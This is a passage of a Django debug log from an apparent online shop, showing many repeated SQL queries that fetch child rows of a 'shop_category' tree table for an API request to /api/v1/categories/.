(0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:49:01,130 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:49:01,136 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:49:01,141 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:49:01,147 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:49:01,150 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:49:01,153 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:49:01,155 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:49:01,158 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:49:01,161 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:49:01,164 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:49:01,166 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:49:01,168 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:49:01,170 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:49:01,174 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:49:01,176 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:49:01,178 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:49:01,180 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:49:01,183 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:49:01,186 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:49:01,189 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:49:01,191 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:49:01,193 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:49:01,195 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:49:01,197 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:49:01,201 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:49:01,203 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:49:01,205 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:49:01,210 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:49:01,212 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:49:01,217 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:49:01,220 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:49:01,222 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:49:01,224 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:49:01,227 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:49:01,230 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:49:01,232 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:49:01,235 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:49:01,237 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:49:01,239 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:49:01,241 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:49:01,244 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:49:01,246 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:49:01,249 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:49:01,251 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:49:01,254 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:49:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:49:01,347 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:49:01,353 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:49:01,357 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:49:01,359 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:49:01,362 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:49:01,365 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:49:01,367 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:49:01,369 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:49:01,371 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:49:01,374 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:49:01,377 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:49:01,379 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:49:01,381 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:49:01,383 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:49:01,387 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:49:01,389 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:49:01,391 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:49:01,393 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:49:01,396 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:49:01,399 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:49:01,402 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:49:01,404 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" 